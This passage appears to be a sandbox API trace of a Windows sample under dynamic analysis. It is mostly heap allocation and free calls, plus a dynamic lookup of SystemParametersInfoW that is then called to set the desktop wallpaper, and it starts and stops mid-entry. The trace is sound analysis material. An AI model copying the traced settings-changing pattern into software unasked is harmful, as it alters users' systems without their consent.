HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0302.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0302.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0302.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0302.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0302.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa508 [0302.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0302.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0302.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0302.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0302.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0302.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0302.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0302.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0302.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0302.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0302.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0302.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0302.824] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0302.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0302.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0302.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0302.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0302.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0302.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0302.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0302.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0302.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0302.824] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0302.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0302.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0302.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0302.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0302.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0302.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0302.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0302.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0302.825] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0302.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0302.825] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0302.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0302.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0302.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0302.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0302.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0302.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0302.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0302.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0302.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0302.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0302.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0302.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0302.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0302.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0302.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0302.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0302.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0302.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0302.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0302.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0302.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0302.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0302.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0302.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0302.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0302.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0302.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0302.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0302.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0302.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0302.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0302.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0302.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0302.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0302.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0302.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0302.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0302.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0302.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0302.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0302.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0302.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0302.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0302.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0302.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0302.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0302.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0302.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0302.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0302.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0302.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0302.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0302.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0302.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0302.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0302.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0302.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0302.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0302.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0302.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0302.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0302.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0302.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0302.828] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0302.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0302.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0302.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0302.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0302.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0302.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0302.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0302.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0302.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0302.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0302.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0302.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0302.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0302.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0302.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0302.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0302.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0302.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0302.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0302.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0302.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0302.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0302.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0302.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0302.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0302.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0302.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0302.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0302.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0302.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0302.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0302.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0302.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0302.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0302.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0302.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0302.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0302.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0302.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0302.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0302.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0302.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0302.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0302.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0302.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0302.830] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0302.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0302.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0302.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0302.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0302.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0302.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0302.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0302.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0302.831] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0302.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0302.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0302.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0302.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0302.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0302.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0302.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0302.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0302.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0302.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0302.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0302.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0302.832] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0302.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0302.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0302.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0302.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0302.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0302.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0302.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0302.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0302.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0302.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0302.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0302.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0302.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0302.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0302.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0302.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0302.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0302.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0302.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0302.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0302.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0302.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0302.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0302.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0302.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0302.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0302.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0302.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0302.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0302.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0302.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0302.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0302.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0302.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0302.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0302.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0302.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0302.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0302.966] FreeLibrary (hLibModule=0x74f40000) returned 1 [0302.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0302.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0302.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0302.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0302.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0302.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0302.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0302.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0302.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0302.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0302.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0302.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0302.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0302.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0302.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0302.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0302.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0302.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0302.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0302.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0302.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0302.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0302.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0302.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0302.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0302.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: 